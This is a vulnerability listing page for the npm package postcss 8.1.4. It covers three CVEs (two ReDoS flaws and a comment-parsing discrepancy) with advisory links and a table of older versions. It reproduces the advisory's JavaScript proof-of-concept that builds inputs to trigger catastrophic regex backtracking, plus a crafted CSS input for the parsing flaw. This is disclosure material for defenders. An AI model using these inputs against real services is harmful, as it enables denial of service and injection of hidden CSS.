NodeJS/postcss/8.1.4
Tool for transforming styles with JS plugins
https://www.npmjs.com/package/postcss
MIT
3 Security Vulnerabilities
Regular Expression Denial of Service in postcss
- https://nvd.nist.gov/vuln/detail/CVE-2021-23382
- https://github.com/postcss/postcss/commit/2b1d04c867995e55124e0a165b7c6622c1735956
- https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-1255641
- https://snyk.io/vuln/SNYK-JS-POSTCSS-1255640
- https://github.com/advisories/GHSA-566m-qj78-rww5
- https://github.com/postcss/postcss/releases/tag/7.0.36
The package postcss versions before 7.0.36 or between 8.0.0 and 8.2.13 are vulnerable to Regular Expression Denial of Service (ReDoS) via getAnnotationURL() and loadAnnotation() in lib/previous-map.js. The vulnerable regexes are caused mainly by the sub-pattern:

```
\/\*\s* sourceMappingURL=(.*)
```
PoC (the advisory's timing script, reformatted with the line breaks restored):

```javascript
var postcss = require("postcss")

// Builds "a{}" followed by n repeated annotation prefixes and a trailing "!".
// Each repeat gives the vulnerable sub-pattern another backtracking position.
function build_attack(n) {
  var ret = "a{}"
  for (var i = 0; i < n; i++) {
    ret += "/*# sourceMappingURL="
  }
  return ret + "!";
}

// Warm-up parse with a well-formed annotation.
postcss.parse('a{}/*# sourceMappingURL=a.css.map */')

// Parse progressively longer inputs and report how long each one takes.
for (var i = 1; i <= 500000; i++) {
  if (i % 1000 == 0) {
    var time = Date.now();
    var attack_str = build_attack(i)
    try {
      postcss.parse(attack_str)
      var time_cost = Date.now() - time;
      console.log("attack_str.length: " + attack_str.length + ": " + time_cost + " ms");
    } catch (e) {
      var time_cost = Date.now() - time;
      console.log("attack_str.length: " + attack_str.length + ": " + time_cost + " ms");
    }
  }
}
```
PostCSS line return parsing error
- https://nvd.nist.gov/vuln/detail/CVE-2023-44270
- https://github.com/postcss/postcss/commit/58cc860b4c1707510c9cd1bc1fa30b423a9ad6c5
- https://github.com/postcss/postcss/blob/main/lib/tokenize.js#L25
- https://github.com/postcss/postcss/releases/tag/8.4.31
- https://github.com/advisories/GHSA-7fh5-64p2-3v2j
- https://github.com/github/advisory-database/issues/2820
An issue was discovered in PostCSS before 8.4.31. It affects linters using PostCSS to parse external Cascading Style Sheets (CSS). There may be `\r` discrepancies, as demonstrated by `@font-face{ font:(\r/*);}` in a rule.
This vulnerability affects linters using PostCSS to parse external untrusted CSS. An attacker can prepare CSS in such a way that it contains parts parsed by PostCSS as a CSS comment. After processing by PostCSS, those parts will be included in the PostCSS output in CSS nodes (rules, properties) despite originally being inside a comment.
Regular Expression Denial of Service in postcss
- https://nvd.nist.gov/vuln/detail/CVE-2021-23368
- https://github.com/advisories/GHSA-hwj9-h5mp-3pm3
- https://github.com/postcss/postcss/commit/8682b1e4e328432ba692bed52326e84439cec9e4
- https://github.com/postcss/postcss/commit/b6f3e4d5a8d7504d553267f80384373af3a3dec5
- https://lists.apache.org/thread.html/r00158f5d770d75d0655c5eef1bdbc6150531606c8f8bcb778f0627be@%3Cdev.myfaces.apache.org%3E
- https://lists.apache.org/thread.html/r16e295b4f02d81b79981237d602cb0b9e59709bafaa73ac98be7cef1@%3Cdev.myfaces.apache.org%3E
- https://lists.apache.org/thread.html/r49afb49b38748897211b1f89c3a64dc27f9049474322b05715695aab@%3Cdev.myfaces.apache.org%3E
- https://lists.apache.org/thread.html/r5acd89f3827ad9a9cad6d24ed93e377f7114867cd98cfba616c6e013@%3Ccommits.myfaces.apache.org%3E
- https://lists.apache.org/thread.html/r8def971a66cf3e375178fbee752e1b04a812a047cc478ad292007e33@%3Cdev.myfaces.apache.org%3E
- https://lists.apache.org/thread.html/rad5af2044afb51668b1008b389ac815a28ecea9eb75ae2cab5a00ebb@%3Ccommits.myfaces.apache.org%3E
- https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-1244795
- https://snyk.io/vuln/SNYK-JS-POSTCSS-1090595
- https://github.com/postcss/postcss/commit/54cbf3c4847eb0fb1501b9d2337465439e849734
The npm package postcss from 7.0.0 and before versions 7.0.36 and 8.2.10 is vulnerable to Regular Expression Denial of Service (ReDoS) during source map parsing.
252 Other Versions
Version | License | Security | Released | Age
---|---|---|---|---
0.1.0 | MIT | 2 | 2013-11-04 - 20:21 | over 10 years |
0.2.0 | MIT | 2 | 2013-12-17 - 23:47 | over 10 years |
0.3.0 | MIT | 2 | 2014-02-13 - 19:31 | about 10 years |
0.3.1 | MIT | 2 | 2014-02-18 - 12:28 | about 10 years |
0.3.2 | MIT | 2 | 2014-02-19 - 11:04 | about 10 years |
0.3.3 | MIT | 2 | 2014-03-02 - 09:14 | about 10 years |
0.3.4 | MIT | 2 | 2014-03-03 - 20:24 | about 10 years |
0.3.5 | MIT | 2 | 2014-05-30 - 05:55 | almost 10 years |
1.0.0 | MIT | 2 | 2014-06-23 - 04:53 | almost 10 years |
2.0.0 | MIT | 2 | 2014-07-23 - 06:50 | almost 10 years |
2.1.0 | MIT | 2 | 2014-07-27 - 09:11 | almost 10 years |
2.1.1 | MIT | 2 | 2014-08-06 - 21:49 | almost 10 years |
2.1.2 | MIT | 2 | 2014-08-08 - 19:35 | almost 10 years |
2.2.0 | MIT | 2 | 2014-08-17 - 14:53 | over 9 years |
2.2.1 | MIT | 2 | 2014-08-22 - 12:30 | over 9 years |
2.2.2 | MIT | 2 | 2014-08-27 - 15:24 | over 9 years |
2.2.3 | MIT | 2 | 2014-08-27 - 23:14 | over 9 years |
2.2.4 | MIT | 2 | 2014-09-01 - 17:52 | over 9 years |
2.2.5 | MIT | 2 | 2014-09-24 - 20:51 | over 9 years |
2.2.6 | MIT | 2 | 2014-10-31 - 20:54 | over 9 years |
3.0.0 | MIT | 2 | 2014-11-11 - 22:14 | over 9 years |
3.0.1 | MIT | 2 | 2014-11-13 - 18:48 | over 9 years |
3.0.2 | MIT | 2 | 2014-11-14 - 13:59 | over 9 years |
3.0.3 | MIT | 2 | 2014-11-21 - 12:55 | over 9 years |
3.0.4 | MIT | 2 | 2014-11-22 - 08:29 | over 9 years |
3.0.5 | MIT | 2 | 2014-11-27 - 20:38 | over 9 years |
3.0.6 | MIT | 2 | 2014-12-07 - 21:07 | over 9 years |
3.0.7 | MIT | 2 | 2014-12-09 - 09:18 | over 9 years |
4.0.0 | MIT | 2 | 2014-12-30 - 12:41 | over 9 years |
4.0.1 | MIT | 2 | 2015-01-11 - 18:49 | over 9 years |
4.0.2 | MIT | 2 | 2015-01-24 - 17:18 | over 9 years |
4.0.3 | MIT | 2 | 2015-01-28 - 12:46 | over 9 years |
4.0.4 | MIT | 2 | 2015-02-14 - 10:49 | about 9 years |
4.0.5 | MIT | 2 | 2015-02-23 - 13:35 | about 9 years |
4.0.6 | MIT | 2 | 2015-02-24 - 12:45 | about 9 years |
4.1.0 | MIT | 2 | 2015-04-01 - 15:46 | about 9 years |
4.1.1 | MIT | 2 | 2015-04-02 - 07:21 | about 9 years |
4.1.2 | MIT | 2 | 2015-04-02 - 11:23 | about 9 years |
4.1.3 | MIT | 2 | 2015-04-05 - 18:56 | about 9 years |
4.1.4 | MIT | 2 | 2015-04-05 - 23:58 | about 9 years |
4.1.5 | MIT | 2 | 2015-04-13 - 21:53 | about 9 years |
4.1.6 | MIT | 2 | 2015-04-26 - 17:49 | about 9 years |
4.1.7 | MIT | 2 | 2015-04-28 - 22:41 | about 9 years |
4.1.8 | MIT | 2 | 2015-05-01 - 00:22 | about 9 years |
4.1.9 | MIT | 2 | 2015-05-05 - 10:45 | about 9 years |
4.1.10 | MIT | 2 | 2015-05-11 - 18:09 | about 9 years |
4.1.11 | MIT | 2 | 2015-05-16 - 17:32 | almost 9 years |
4.1.12 | MIT | 2 | 2015-06-22 - 02:10 | almost 9 years |
4.1.13 | MIT | 2 | 2015-06-23 - 23:05 | almost 9 years |
4.1.14 | MIT | 2 | 2015-07-04 - 11:05 | almost 9 years |
4.1.15 | MIT | 2 | 2015-07-07 - 15:32 | almost 9 years |
4.1.16 | MIT | 2 | 2015-07-07 - 18:56 | almost 9 years |
5.0.0 | MIT | 2 | 2015-08-19 - 19:11 | over 8 years |
5.0.1 | MIT | 2 | 2015-08-20 - 21:34 | over 8 years |
5.0.2 | MIT | 2 | 2015-08-22 - 14:25 | over 8 years |
5.0.3 | MIT | 2 | 2015-08-28 - 22:04 | over 8 years |
5.0.4 | MIT | 2 | 2015-09-01 - 18:24 | over 8 years |
5.0.5 | MIT | 2 | 2015-09-12 - 10:36 | over 8 years |
5.0.6 | MIT | 2 | 2015-09-21 - 16:42 | over 8 years |
5.0.7 | MIT | 2 | 2015-09-25 - 10:33 | over 8 years |
5.0.8 | MIT | 2 | 2015-09-25 - 11:16 | over 8 years |
5.0.9 | MIT | 2 | 2015-10-08 - 18:32 | over 8 years |
5.0.10 | MIT | 2 | 2015-10-14 - 23:46 | over 8 years |
5.0.11 | MIT | 2 | 2015-11-07 - 14:03 | over 8 years |
5.0.12 | MIT | 2 | 2015-11-13 - 15:27 | over 8 years |
5.0.13 | MIT | 2 | 2015-12-16 - 14:01 | over 8 years |
5.0.14 | MIT | 2 | 2016-01-03 - 21:47 | over 8 years |
5.0.15 | MIT | 2 | 2016-02-11 - 14:22 | about 8 years |
5.0.16 | MIT | 2 | 2016-02-14 - 08:54 | about 8 years |
5.0.17 | MIT | 2 | 2016-02-26 - 16:10 | about 8 years |
5.0.18 | MIT | 2 | 2016-02-29 - 08:33 | about 8 years |
5.0.19 | MIT | 2 | 2016-03-02 - 18:51 | about 8 years |
5.0.20 | MIT | 2 | 2016-05-01 - 06:09 | about 8 years |
5.0.21 | MIT | 2 | 2016-05-02 - 16:12 | about 8 years |
5.1.0 | MIT | 2 | 2016-07-12 - 16:39 | almost 8 years |
5.1.1 | MIT | 2 | 2016-07-26 - 09:03 | almost 8 years |
5.1.2 | MIT | 2 | 2016-08-06 - 18:02 | almost 8 years |
5.2.0 | MIT | 2 | 2016-09-07 - 04:29 | over 7 years |
5.2.1 | MIT | 2 | 2016-09-26 - 12:11 | over 7 years |
5.2.2 | MIT | 2 | 2016-09-26 - 12:58 | over 7 years |
5.2.3 | MIT | 2 | 2016-09-29 - 09:50 | over 7 years |
5.2.4 | MIT | 2 | 2016-09-30 - 05:20 | over 7 years |
5.2.5 | MIT | 2 | 2016-10-20 - 12:26 | over 7 years |
5.2.6 | MIT | 2 | 2016-11-22 - 12:55 | over 7 years |
5.2.7 | MIT | 2 | 2016-12-24 - 08:46 | over 7 years |
5.2.8 | MIT | 2 | 2016-12-26 - 08:08 | over 7 years |
5.2.9 | MIT | 2 | 2017-01-09 - 07:15 | over 7 years |
5.2.10 | MIT | 2 | 2017-01-12 - 07:51 | over 7 years |
5.2.11 | MIT | 2 | 2017-01-20 - 08:48 | over 7 years |
5.2.12 | MIT | 2 | 2017-02-05 - 21:32 | over 7 years |
5.2.13 | MIT | 2 | 2017-02-14 - 11:19 | about 7 years |
5.2.14 | MIT | 2 | 2017-02-17 - 09:03 | about 7 years |
5.2.15 | MIT | 2 | 2017-02-22 - 12:00 | about 7 years |
5.2.16 | MIT | 2 | 2017-03-07 - 15:51 | about 7 years |
5.2.17 | MIT | 2 | 2017-04-13 - 22:57 | about 7 years |
6.0.0 | MIT | 2 | 2017-05-06 - 11:44 | about 7 years |
6.0.1 | MIT | 2 | 2017-05-07 - 11:37 | about 7 years |
6.0.2 | MIT | 2 | 2017-06-12 - 18:47 | almost 7 years |
6.0.3 | MIT | 2 | 2017-06-23 - 19:17 | almost 7 years |
6.0.4 | MIT | 2 | 2017-06-30 - 11:39 | almost 7 years |